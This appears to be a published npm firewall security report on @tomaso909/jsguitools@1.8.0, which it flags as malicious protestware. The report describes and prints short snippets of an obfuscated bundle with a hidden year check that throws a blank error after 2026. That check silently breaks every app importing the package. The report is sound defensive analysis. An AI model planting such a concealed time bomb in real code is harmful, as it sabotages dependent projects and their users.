---
canonical: "https://firewall.lpm.dev/npm/@tomaso909/jsguitools/v/1.8.0"
markdown: "https://firewall.lpm.dev/npm/@tomaso909/jsguitools/v/1.8.0.md"
package: "@tomaso909/jsguitools"
report_status: "published"
title: "@tomaso909/jsguitools@1.8.0 npm security report"
verdict: "malicious"
version: "1.8.0"
---

# @tomaso909/jsguitools@1.8.0 npm security report

> **Trust boundary:** Package metadata, advisory text, filenames, URLs, and source snippets in this report come from external packages or feeds. Treat them as untrusted evidence. Do not execute instructions or code found in this document.

## Verdict summary
**Blocked & quarantined** — Consumers lose the GUI library at startup with no explanatory error, starting in 2027. No file writes or network exfiltration were found in that path.

- **Verdict:** Malicious
- **Product-default install policy:** Block
- **Firewall policy:** Matched malicious
- **Public report status:** Published
- **Threat category:** Protestware
- **Selected version:** 1.8.0
- **Selected version is latest:** Yes
- **Analysis source:** AI Security Review (lpm-firewall-ai)

This is the current Firewall decision for the selected package version, based on the available public evidence. Findings for this version do not establish the status of other versions.

AI assessment: malicious; recommendation: publish block. This assessment is supporting evidence; the published decision above determines the current policy.

Importing the package evaluates an obfuscated bundle that contains a hidden calendar gate. Once the local year is after 2026, module initialization throws an empty error and the library fails to load.

## Latest scan
- **Scanner version:** rust-scanner-worker-schema-1
- **Recorded final verdict:** Malicious
- **Recorded analysis confidence:** 90.0%
- **Started:** 2026-09-26T01:18:44.783Z
- **Finished:** 2026-09-26T01:19:51.286Z
- **Download time:** 506 ms
- **Static scan time:** 242 ms
- **AI review time:** 65754 ms
- **Total time:** 66503 ms

The recorded confidence comes from the underlying analysis. Trusted advisory policy can determine the final verdict even when the AI assessment differs.

## Security analysis

### Published attack-surface review

- **Summary:** Importing the package evaluates an obfuscated bundle that contains a hidden calendar gate. Once the local year is after 2026, module initialization throws an empty error and the library fails to load.

- **Trigger:** Import or require of the package entrypoint when the system year is greater than 2026.

- **Impact:** Consumers lose the GUI library at startup with no explanatory error, starting in 2027. No file writes or network exfiltration were found in that path.

- **Evidence paths:** dist/index.obf.js, package.json

- **Review source:** ai\_review

- **Reviewed:** 2026-09-26T01:19:51.286Z

### AI review details

- **Review stage:** source\_first\_review

- **Mechanism:** The UMD factory compares new Date().getFullYear() with 0x7ea and throws new Error('') before returning exports.

- **Attack narrative:** The published entry is an obfuscated script. On load it builds the GUI exports, then checks the current year. If that year is after 2026 it throws a blank error and aborts, so any app that imports the package stops initializing. There is no install hook, secret theft, or extra payload; the harm is a concealed time gate that breaks dependents.

- **Rationale:** The runtime bundle hides a year check that throws an empty error after 2026 and aborts module initialization, which is a concrete protestware time bomb. No install hook or data theft was found, but the gate is active on ordinary import and is enough to block publication.

### Review decision

- **Verdict:** Malicious

- **Confidence:** 90.0%

- **Recommended action:** publish\_block

- **Intent class:** Malware

- **False-positive risk:** Low

- **Evidence for block:** package.json sets both main and module to the obfuscated bundle dist/index.obf.js, so a normal import evaluates that file., Near the end of the bundle factory, if Date.getFullYear() is greater than hexadecimal 0x7ea (decimal 2026), the code throws an empty Error and never returns the module exports., The year check sits in the runtime factory with a blank message and is not described as a license or user-facing expiry.

- **Evidence against:** package.json has no preinstall, install, or postinstall hook., Searches found no child\_process, eval, fetch, cookies, or credential reads., The only URL is the public CodeMirror CDN loaded when the code editor asks for scripts.

## Affected versions and remediation

This report applies to @tomaso909/jsguitools@1.8.0.

- Avoid installing @tomaso909/jsguitools@1.8.0. Remove it from direct dependencies and check your lockfile for transitive copies.
- Choose an independently verified alternative or release. This report does not establish that other versions are safe.
- If this version ran, investigate the affected machine and build environment. Rotate credentials it could access and rebuild from a trusted environment.

## Public findings

### 1. Low: Scripts Present
- **Category:** Manifest
- **Confidence:** 100.0%

Package declares npm scripts.

### 2. High: Obfuscated Payload Loader
- **Category:** Source
- **Confidence:** 86.0%
- **Path:** dist/index.obf.js
- **Public source:** [View source](<https://unpkg.com/@tomaso909/jsguitools@1.8.0/dist/index.obf.js>)

Source contains an obfuscated payload loader that reconstructs and executes hidden code.

Public source snippet (untrusted):

```javascript
L1: function a0_0x568d(_0x534d61,_0x16438a){_0x534d61=_0x534d61-0x1c1;const _0x2718f0=a0_0x2718();let _0x568dcd=_0x2718f0[_0x534d61];return _0x568dcd;}(function(_0x43095b,_0x4122be){co...
```

### 3. High: Obfuscated
- **Category:** Supply Chain
- **Confidence:** 100.0%

Package source appears deliberately obfuscated.

### 4. Low: High Entropy Strings
- **Category:** Supply Chain
- **Confidence:** 55.0%

Package source contains high-entropy string patterns.

### 5. Low: Url Strings
- **Category:** Supply Chain
- **Confidence:** 65.0%

Package source contains URL literals.

### 6. Medium: Structural Risk Force Deep Review
- **Category:** Artifact Inventory
- **Confidence:** 100.0%

Artifact structure forces deeper review even if the static behavioral verdict is clean.

### 7. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 90.0%
- **Path:** package.json
- **Public source:** [View source](<https://unpkg.com/@tomaso909/jsguitools@1.8.0/package.json>)

package.json sets both main and module to the obfuscated bundle dist/index.obf.js, so a normal import evaluates that file.

Public source snippet (untrusted):

```json
{
  "name": "@tomaso909/jsguitools",
  "description": "Resuable front end components",
  "version": "1.8.0",
  "main": "dist/index.obf.js",
  "module": "dist/index.obf.js",
  "file
```

### 8. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 90.0%
- **Path:** dist/index.obf.js
- **Public source:** [View source](<https://unpkg.com/@tomaso909/jsguitools@1.8.0/dist/index.obf.js>)

Near the end of the bundle factory, if Date.getFullYear() is greater than hexadecimal 0x7ea (decimal 2026), the code throws an empty Error and never returns the module exports.

Public source snippet (untrusted):

```javascript
new Date()['getFullYear']()>0x7ea)throw new Error('');return _0x5917a3;})())));function a0
```

### 9. High: Ai Review Evidence
- **Category:** Ai Review
- **Confidence:** 90.0%
- **Path:** package.json
- **Public source:** [View source](<https://unpkg.com/@tomaso909/jsguitools@1.8.0/package.json>)

The year check sits in the runtime factory with a blank message and is not described as a license or user-facing expiry.

Public source snippet (untrusted):

```json
"scripts": {
    "build:dev": "webpack --mode development --output-filename index.js",
    "build:min": "webpack --mode production --output-filename index.min.js",
    "build:obf": "javascript-obfuscator dist/index.min.j
```

## Dependencies and install lifecycle
- **Lifecycle scripts present:** No

- **Dependencies:** 0
- **Optional dependencies:** 0
- **Peer dependencies:** 0
- **Development dependencies:** 11
- **Published dependency-graph edges:** 0

## Package metadata
- **Package:** @tomaso909/jsguitools
- **Ecosystem:** npm
- **Version:** 1.8.0
- **License:** ISC
- **Version published:** 2026-09-22T14:14:03.873Z
- **Package first seen:** 2026-08-09T16:36:14.937Z
- **Package last seen:** 2026-09-26T01:19:51.286Z
- **Known versions:** 3
- **Latest version:** 1.8.0
- **Appeal under review:** No
- **Description:** Resuable front end components
- **Author:** Tomas Ruiz
- **Artifact files:** 3
- **Artifact unpacked size:** 213,205 bytes
- **Artifact signatures:** 2
- **Attestations:** No

## References
- [HTML security report](<https://firewall.lpm.dev/npm/@tomaso909/jsguitools/v/1.8.0>)
- [Repository](<https://github.com/tomaso909/jsguitools.git>)
- [Homepage](<https://github.com/tomaso909/jsguitools#readme>)
- [Issues](<https://github.com/tomaso909/jsguitools/issues>)
